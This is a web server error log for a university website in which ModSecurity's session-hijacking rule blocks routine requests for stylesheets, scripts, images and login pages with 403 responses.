[Mon Aug 28 08:50:26.159304 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9YsCo-f0AAJbxo@4AAAAJ"]
[Mon Aug 28 08:50:55.475366 2023] [:error] [pid 38685] [client 125.164.17.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv9f8Co-f0AAJcdfJMAAAAR"]
[Mon Aug 28 08:50:55.476736 2023] [:error] [pid 38689] [client 125.164.20.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv9f8Co-f0AAJchk8sAAAAF"]
[Mon Aug 28 08:50:55.476796 2023] [:error] [pid 38644] [client 125.164.17.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv9f8Co-f0AAJb0F@EAAAAK"]
[Mon Aug 28 08:50:55.508429 2023] [:error] [pid 38648] [client 125.164.19.245] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv9f8Co-f0AAJb4sUgAAAAL"]
[Mon Aug 28 08:51:14.654373 2023] [:error] [pid 38685] [client 125.164.17.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv9ksCo-f0AAJcdfJUAAAAR"]
[Mon Aug 28 08:51:23.217629 2023] [:error] [pid 38685] [client 125.164.22.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv9m8Co-f0AAJcdfJYAAAAR"]
[Mon Aug 28 08:51:42.250549 2023] [:error] [pid 38687] [client 125.164.16.107] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv9rsCo-f0AAJcfLKMAAAAC"]
[Mon Aug 28 08:51:44.348293 2023] [:error] [pid 38646] [client 125.164.16.107] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9sMCo-f0AAJb21DcAAAAB"]
[Mon Aug 28 08:51:56.060611 2023] [:error] [pid 38690] [client 125.164.18.1] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9vMCo-f0AAJciCuIAAAAG"]
[Mon Aug 28 08:52:02.754338 2023] [:error] [pid 38686] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9wsCo-f0AAJceGMMAAAAA"]
[Mon Aug 28 08:52:04.565012 2023] [:error] [pid 38647] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9xMCo-f0AAJb3RZwAAAAH"]
[Mon Aug 28 08:52:26.427254 2023] [:error] [pid 38683] [client 125.164.22.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv92sCo-f0AAJcb49IAAAAP"]
[Mon Aug 28 08:53:23.416848 2023] [:error] [pid 38726] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv@E8Co-f0AAJdGkgQAAAAF"]
[Mon Aug 28 08:53:23.638110 2023] [:error] [pid 38727] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@E8Co-f0AAJdH0DYAAAAI"]
[Mon Aug 28 08:53:24.931303 2023] [:error] [pid 38114] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv@FMCo-f0AAJTiojUAAAAE"]
[Mon Aug 28 08:53:24.962349 2023] [:error] [pid 38686] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@FMCo-f0AAJceGMsAAAAA"]
[Mon Aug 28 08:54:41.903263 2023] [:error] [pid 38647] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv@YcCo-f0AAJb3RaEAAAAH"]
[Mon Aug 28 08:54:42.754828 2023] [:error] [pid 38690] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv@YsCo-f0AAJciCuoAAAAG"]
[Mon Aug 28 08:55:55.833146 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv@q8Co-f0AAJcfLLIAAAAC"]
[Mon Aug 28 08:55:56.307986 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv@rMCo-f0AAJb4sWgAAAAL"]
[Mon Aug 28 08:55:56.359152 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv@rMCo-f0AAJbxpAcAAAAJ"]
[Mon Aug 28 08:55:56.359264 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv@rMCo-f0AAJTiokAAAAAE"]
[Mon Aug 28 08:55:56.360806 2023] [:error] [pid 38727] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv@rMCo-f0AAJdH0D0AAAAI"]
[Mon Aug 28 08:55:56.558810 2023] [:error] [pid 38726] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOv@rMCo-f0AAJdGkgsAAAAF"]
[Mon Aug 28 08:55:56.823486 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv@rMCo-f0AAJTiokEAAAAE"]
[Mon Aug 28 08:55:57.252523 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOv@rcCo-f0AAJcb498AAAAP"]
[Mon Aug 28 08:55:57.362602 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOv@rcCo-f0AAJb4sWkAAAAL"]
[Mon Aug 28 08:55:57.951402 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@rcCo-f0AAJb4sWoAAAAL"]
[Mon Aug 28 08:56:04.020075 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv@tMCo-f0AAJcb4@AAAAAP"]
[Mon Aug 28 08:56:06.651159 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@tsCo-f0AAJceGNQAAAAA"]
[Mon Aug 28 08:56:54.413499 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv@5sCo-f0AAJb3RbUAAAAH"]
[Mon Aug 28 08:56:54.428923 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@5sCo-f0AAJb4sXcAAAAL"]
[Mon Aug 28 08:56:54.442929 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv@5sCo-f0AAJcg6dQAAAAD"]
[Mon Aug 28 08:56:54.443036 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@5sCo-f0AAJTiok0AAAAE"]
[Mon Aug 28 08:56:54.453022 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv@5sCo-f0AAJcfLMAAAAAC"]
[Mon Aug 28 08:56:54.454810 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv@5sCo-f0AAJceGNwAAAAA"]
[Mon Aug 28 08:56:54.462901 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv@5sCo-f0AAJb4sXgAAAAL"]
[Mon Aug 28 08:56:54.462953 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@5sCo-f0AAJTiok4AAAAE"]
[Mon Aug 28 08:56:54.462978 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv@5sCo-f0AAJb3RbYAAAAH"]
[Mon Aug 28 08:56:54.472552 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv@5sCo-f0AAJcg6dUAAAAD"]
[Mon Aug 28 08:56:54.473370 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv@5sCo-f0AAJceGN0AAAAA"]
[Mon Aug 28 08:56:54.475864 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv@5sCo-f0AAJcfLMEAAAAC"]
[Mon Aug 28 08:56:54.523063 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv@5sCo-f0AAJcfLMIAAAAC"]
[Mon Aug 28 08:56:54.523127 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@5sCo-f0AAJbxpBQAAAAJ"]
[Mon Aug 28 08:56:54.523137 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv@5sCo-f0AAJb4sXkAAAAL"]
[Mon Aug 28 08:56:54.523167 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv@5sCo-f0AAJcg6dYAAAAD"]
[Mon Aug 28 08:56:54.523221 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv@5sCo-f0AAJb3RbcAAAAH"]
[Mon Aug 28 08:56:54.527142 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv@5sCo-f0AAJceGN4AAAAA"]
[Mon Aug 28 08:56:54.558741 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv@5sCo-f0AAJb4sXoAAAAL"]
[Mon Aug 28 08:56:54.558744 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv@5sCo-f0AAJb3RbgAAAAH"]
[Mon Aug 28 08:56:54.558826 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv@5sCo-f0AAJbxpBUAAAAJ"]
[Mon Aug 28 08:56:54.558862 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv@5sCo-f0AAJcg6dcAAAAD"]
[Mon Aug 28 08:56:54.559728 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@5sCo-f0AAJTiok8AAAAE"]
[Mon Aug 28 08:56:54.559865 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv@5sCo-f0AAJceGN8AAAAA"]
[Mon Aug 28 08:56:54.599511 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@5sCo-f0AAJcfLMMAAAAC"]
[Mon Aug 28 08:56:54.599565 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv@5sCo-f0AAJbxpBYAAAAJ"]
[Mon Aug 28 08:56:54.600489 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv@5sCo-f0AAJb3RbkAAAAH"]
[Mon Aug 28 08:56:54.600613 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv@5sCo-f0AAJTiolAAAAAE"]
[Mon Aug 28 08:56:54.734896 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@5sCo-f0AAJb4sXsAAAAL"]
[Mon Aug 28 08:57:02.630651 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv@7sCo-f0AAJb4sX0AAAAL"]
[Mon Aug 28 08:57:02.717425 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@7sCo-f0AAJceGOEAAAAA"]
[Mon Aug 28 08:57:03.331905 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv@78Co-f0AAJb3RbwAAAAH"]
